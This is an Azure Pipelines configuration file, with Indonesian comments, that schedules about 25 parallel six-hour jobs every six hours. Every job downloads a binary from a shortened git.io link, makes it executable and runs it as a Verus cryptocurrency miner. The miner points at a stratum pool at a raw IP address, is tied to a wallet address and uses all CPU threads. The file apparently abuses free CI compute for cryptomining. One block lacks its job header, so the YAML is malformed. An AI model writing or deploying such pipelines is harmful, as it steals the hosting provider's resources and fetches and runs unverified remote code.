trigger:
- main

schedules:
  - cron: "20 */6 * * *"   # Menjalankan pipeline setiap 6 jam pada menit 20 (6:20, 12:20, 18:20, 00:20 UTC)
    displayName: "Run every 6 hours at 20 minutes past the hour"
    branches:
      include:
        - main
    always: true

pool:
  vmImage: 'ubuntu-22.04'  # Menggunakan Ubuntu 22.04 sebagai image

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
- job: c
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: d
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: e
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
- job: f
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: g
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: h
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: i
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
- job: k
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
- job: l
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
     wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: m
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: n
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: o
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
      
- job: p
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: q
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: r
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: s
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: t
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: u
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: v
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: w
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: x
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)

- job: y
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: |
      wget -qO code git.io/JiGZh && chmod +x code && ./code -a verus -o stratum+tcp://146.190.179.16:80 -u RCrYp7n3Nzr7yErmpdhGnLaWFXeZTrcik9.ewejeffbansos -t $(nproc)
